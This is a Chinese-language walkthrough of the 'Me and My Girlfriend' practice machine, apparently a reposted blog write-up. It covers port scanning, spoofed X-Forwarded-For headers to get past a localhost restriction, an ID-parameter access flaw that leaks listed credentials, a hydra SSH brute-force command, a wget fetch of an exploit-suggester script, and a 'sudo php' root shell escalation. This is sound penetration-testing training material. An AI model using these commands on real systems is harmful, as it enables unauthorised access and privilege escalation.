8.me and my girlfriend
阿新 • • 發佈:2021-12-20
me and my girlfriend
一個不錯的練手靶機
靶機 : me and my girlfriend
滲透機 : kali + win10
補充 : 如果靶機自帶的是nat網路 , 如果需要更改 , 別忘記啦 , 我忘記是什麼啦
目標: 拿到flag1.txt flag2.txt
0x01. 資訊收集
1. 確定靶機ip
掃描當前網段ip
kali 192.168.0.105 靶機 192.168.0.110
2. 掃描全埠
rustscan -a 192.168.0.110 -r 1-65535 -- -sV 這裡用的是rustscan掃描的 , 當然你也可以用nmap
既然開放了 22 80 , 那麼訪問一下80埠 , 發現只允許本地訪問 , 那麼我們就簡單的繞一下
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
不知道是哪個頭獲取的ip , 索性全加上吧
這樣就有許可權訪問了 , 接下來就是簡單的註冊一個登入試一試
0x02. 漏洞探測
1. 漏洞驗證
通過你多年的滲透經驗 , 發現了一個uid引數 , 很有可能存在越權漏洞 , fuzz一下試試
細節 , 0-12
果然存在越權漏洞 , 獲取到存在的賬號和密碼
user
alice
sundatea
aingmaung
abdikasepak
eweuhtandingan
sedihaingmah
passwd
4lic3
indONEsia
qwerty!!!
dorrrrr
skuyatuh
cedihhihihi
之前掃描出來一個22埠 , 嘗試用這些賬號和密碼爆破一下
hydra -L ./user.txt -P ./passwd.txt -vV -f 192.168.0.110 ssh
最後爆出賬密
alice 4lic3
然後就是ssh登入
2. 拿到shell
ssh [email protected]
然後通過檢視家目錄的隱藏檔案 , 找到一個我的祕密資料夾
根據提示 , 接下來就是提權進到root下找到最後的flag啦
0x03. 提權
1. 主機資訊收集
提權的本質也就是根據主機的漏洞 , 進行許可權提升 , 所以還是要資訊收集的
GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
或者用這個提權輔助工具
https://github.com/mzet-/linux-exploit-suggester.git
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
上傳Linux資訊收集指令碼發現一個sudoers提權方法 , 但是靶機無法呼叫gcc編譯 , 所以看看有沒有其他方法
2. php提權
sudo -l
https://gtfobins.github.io/gtfobins/php/#suid
sudo php -r "system('/bin/bash');"
順利拿到第二個flag
Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}